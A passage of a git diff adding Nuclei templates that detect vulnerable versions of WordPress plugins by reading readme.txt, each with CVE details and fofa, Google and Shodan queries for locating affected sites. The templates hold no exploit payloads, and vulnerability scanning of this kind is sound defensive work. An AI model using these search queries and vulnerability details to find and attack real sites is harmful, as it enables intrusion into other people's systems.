redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/push-notification-by-feedify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "push-notification-by-feedify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml b/poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml new file mode 100644 index 0000000000..27a3619aed --- /dev/null +++ b/poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11852-f4234a32245049244f37cd7740e74ea6 + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) <= 5.10.12 - Missing Authorization + author: topscoder + severity: low + description: > + The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_layouts() function in all versions up to, and including, 5.10.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a detailed listing of layout templates. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-11852 + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:CVE-2024-11852' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.10.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml b/poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml new file mode 100644 index 0000000000..25f3b171cf --- /dev/null +++ b/poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b + +info: + name: > + My IDX Home Search <= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-search' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11889 + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:CVE-2024-11889' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml b/poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml new file mode 100644 index 0000000000..8be7ea258b --- /dev/null +++ b/poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838 + +info: + name: > + Contact Form, Survey & Form Builder – MightyForms <= 1.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Contact Form, Survey & Form Builder – MightyForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mightyforms' shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11897 + metadata: + fofa-query: "wp-content/plugins/mightyforms/" + google-query: inurl:"/wp-content/plugins/mightyforms/" + shodan-query: 'vuln:CVE-2024-11897' + tags: cve,wordpress,wp-plugin,mightyforms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mightyforms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mightyforms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11938.yaml b/poc/cve/CVE-2024-11938.yaml new file mode 100644 index 0000000000..8d1c86e127 --- /dev/null +++ b/poc/cve/CVE-2024-11938.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11938-a897d23a992f88a13f8a92c28cfec734 + +info: + name: > + One Click Upsell Funnel for WooCommerce <= 3.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via wps_wocuf_pro_yes Shortcode + author: topscoder + severity: low + description: > + The One Click Upsell Funnel for WooCommerce – Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wps_wocuf_pro_yes shortcode in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11938 + metadata: + fofa-query: "wp-content/plugins/woo-one-click-upsell-funnel/" + google-query: inurl:"/wp-content/plugins/woo-one-click-upsell-funnel/" + shodan-query: 'vuln:CVE-2024-11938' + tags: cve,wordpress,wp-plugin,woo-one-click-upsell-funnel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-one-click-upsell-funnel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-one-click-upsell-funnel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11975.yaml b/poc/cve/CVE-2024-11975.yaml new file mode 100644 index 0000000000..a434940a2e --- /dev/null +++ b/poc/cve/CVE-2024-11975.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11975-05a237ca7357ff8d76d54d31a44bc202 + +info: + name: > + Reactflow Visitor Recording and Heatmaps <= 1.0.10 - Cross-Site Request Forgery to Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Reactflow Visitor Recording and Heatmaps plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.10. This is due to missing or incorrect nonce validation affecting the _wpnonce parameter. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11975 + metadata: + fofa-query: "wp-content/plugins/reactflow-session-replay-heatmap/" + google-query: inurl:"/wp-content/plugins/reactflow-session-replay-heatmap/" + shodan-query: 'vuln:CVE-2024-11975' + tags: cve,wordpress,wp-plugin,reactflow-session-replay-heatmap,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/reactflow-session-replay-heatmap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "reactflow-session-replay-heatmap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11977.yaml b/poc/cve/CVE-2024-11977.yaml new file mode 100644 index 0000000000..c3b33c2b03 --- /dev/null +++ b/poc/cve/CVE-2024-11977.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11977-0110488fb1a5f556982113b515b4f15e + +info: + name: > + kk Star Ratings – Rate Post & Collect User Feedbacks <= 5.4.10 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The kk Star Ratings – Rate Post & Collect User Feedbacks plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.4.10. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea49fb-2703-4754-9abd-5f4e526d5570?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-11977 + metadata: + fofa-query: "wp-content/plugins/kk-star-ratings/" + google-query: inurl:"/wp-content/plugins/kk-star-ratings/" + shodan-query: 'vuln:CVE-2024-11977' + tags: cve,wordpress,wp-plugin,kk-star-ratings,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kk-star-ratings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kk-star-ratings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.4.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12066.yaml b/poc/cve/CVE-2024-12066.yaml new file mode 100644 index 0000000000..1c7f1528a0 --- /dev/null +++ b/poc/cve/CVE-2024-12066.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12066-a769524de5fd8cbd0b99e8393122048b + +info: + name: > + SMSA Shipping(official) <= 2.2 - Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + The SMSA Shipping(official) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the smsa_delete_label() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/29d72347-ba49-45c6-a964-2c75064ac866?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-12066 + metadata: + fofa-query: "wp-content/plugins/smsa-shipping-official/" + google-query: inurl:"/wp-content/plugins/smsa-shipping-official/" + shodan-query: 'vuln:CVE-2024-12066' + tags: cve,wordpress,wp-plugin,smsa-shipping-official,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smsa-shipping-official/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smsa-shipping-official" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12262.yaml b/poc/cve/CVE-2024-12262.yaml new file mode 100644 index 0000000000..c4c78aa1d9 --- /dev/null +++ b/poc/cve/CVE-2024-12262.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12262-44dd458108e38e1a10ff93aa59a1bca6 + +info: + name: > + Ebook Store <= 5.8001 - Reflected Cross-Site Scripting via 'step' + author: topscoder + severity: medium + description: > + The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'step' parameter in all versions up to, and including, 5.8001 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8a13e3-f6f5-4673-b223-95eb11465756?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12262 + metadata: + fofa-query: "wp-content/plugins/ebook-store/" + google-query: inurl:"/wp-content/plugins/ebook-store/" + shodan-query: 'vuln:CVE-2024-12262' + tags: cve,wordpress,wp-plugin,ebook-store,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ebook-store/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ebook-store" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.8001') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml b/poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml new file mode 100644 index 0000000000..207a13ef26 --- /dev/null +++ b/poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12338-7049005d472255be06aaa45a94022e7a + +info: + name: > + Website Toolbox Community <= 2.0.1 - Reflected Cross-Site Scripting via websitetoolbox_username + author: topscoder + severity: medium + description: > + The Website Toolbox Community plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘websitetoolbox_username’ parameter in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eae14ac7-ebc1-45a1-b0dd-fec2bbb14460?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12338 + metadata: + fofa-query: "wp-content/plugins/website-toolbox-forums/" + google-query: inurl:"/wp-content/plugins/website-toolbox-forums/" + shodan-query: 'vuln:CVE-2024-12338' + tags: cve,wordpress,wp-plugin,website-toolbox-forums,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/website-toolbox-forums/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "website-toolbox-forums" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12408.yaml b/poc/cve/CVE-2024-12408.yaml new file mode 100644 index 0000000000..a00b512bb9 --- /dev/null +++ b/poc/cve/CVE-2024-12408.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12408-260120a293bed72f17136733a5d35a68 + +info: + name: > + WP on AWS <= 5.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP on AWS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST data in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12408 + metadata: + fofa-query: "wp-content/plugins/wp-migrate-2-aws/" + google-query: inurl:"/wp-content/plugins/wp-migrate-2-aws/" + shodan-query: 'vuln:CVE-2024-12408' + tags: cve,wordpress,wp-plugin,wp-migrate-2-aws,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-migrate-2-aws/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-migrate-2-aws" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml b/poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml new file mode 100644 index 0000000000..5854e8e63d --- /dev/null +++ b/poc/cve/CVE-2024-12502-165e0e004bfa0e15f19fa07916376304.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12502-165e0e004bfa0e15f19fa07916376304 + +info: + name: > + My IDX Home Search <= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-landing' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12502 + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:CVE-2024-12502' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12558.yaml b/poc/cve/CVE-2024-12558.yaml new file mode 100644 index 0000000000..15b09e8482 --- /dev/null +++ b/poc/cve/CVE-2024-12558.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12558-027030512640daa77ea3d82e9a1d2312 + +info: + name: > + WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure via app_export_db + author: topscoder + severity: low + description: > + The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/09831b2f-8f79-4833-8fc6-f1af56c6abc8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12558 + metadata: + fofa-query: "wp-content/plugins/wp-base-booking-of-appointments-services-and-events/" + google-query: inurl:"/wp-content/plugins/wp-base-booking-of-appointments-services-and-events/" + shodan-query: 'vuln:CVE-2024-12558' + tags: cve,wordpress,wp-plugin,wp-base-booking-of-appointments-services-and-events,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-base-booking-of-appointments-services-and-events/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-base-booking-of-appointments-services-and-events" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12588.yaml b/poc/cve/CVE-2024-12588.yaml new file mode 100644 index 0000000000..96853294d9 --- /dev/null +++ b/poc/cve/CVE-2024-12588.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12588-74fdbee90e8f1569c31b65ae5ac69c79 + +info: + name: > + Shortcodes and extra features for Phlox theme <= 2.16.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Staff Widget + author: topscoder + severity: low + description: > + The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Staff widget in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/766cb6d0-1839-4d8c-819c-4e5dab408f6c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12588 + metadata: + fofa-query: "wp-content/plugins/auxin-elements/" + google-query: inurl:"/wp-content/plugins/auxin-elements/" + shodan-query: 'vuln:CVE-2024-12588' + tags: cve,wordpress,wp-plugin,auxin-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/auxin-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "auxin-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.16.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12591.yaml b/poc/cve/CVE-2024-12591.yaml new file mode 100644 index 0000000000..fd388e04ff --- /dev/null +++ b/poc/cve/CVE-2024-12591.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12591-2661762fc85d1a9540507c69b111201b + +info: + name: > + MagicPost <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via wb_share_social Shortcode + author: topscoder + severity: low + description: > + The MagicPost plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wb_share_social shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12591 + metadata: + fofa-query: "wp-content/plugins/magicpost/" + google-query: inurl:"/wp-content/plugins/magicpost/" + shodan-query: 'vuln:CVE-2024-12591' + tags: cve,wordpress,wp-plugin,magicpost,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/magicpost/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "magicpost" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12635.yaml b/poc/cve/CVE-2024-12635.yaml new file mode 100644 index 0000000000..c192e91704 --- /dev/null +++ b/poc/cve/CVE-2024-12635.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12635-092a05628ca831a1bb9c607c24d54577 + +info: + name: > + WP Docs <= 2.2.0 - Authenticated (Subscriber+) Time-Based SQL Injection via 'dir_id' + author: topscoder + severity: low + description: > + The WP Docs plugin for WordPress is vulnerable to time-based SQL Injection via the 'dir_id' parameter in all versions up to, and including, 2.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The vulnerability was partially patched in version 2.2.0. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbbfe66-09fe-48c9-9af1-0b7b90ac222a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12635 + metadata: + fofa-query: "wp-content/plugins/wp-docs/" + google-query: inurl:"/wp-content/plugins/wp-docs/" + shodan-query: 'vuln:CVE-2024-12635' + tags: cve,wordpress,wp-plugin,wp-docs,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-docs/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-docs" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12697.yaml b/poc/cve/CVE-2024-12697.yaml new file mode 100644 index 0000000000..c57d49450d --- /dev/null +++ b/poc/cve/CVE-2024-12697.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12697-8db77733a75f37172aa83e4825bd6e85 + +info: + name: > + real.Kit <= 5.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The 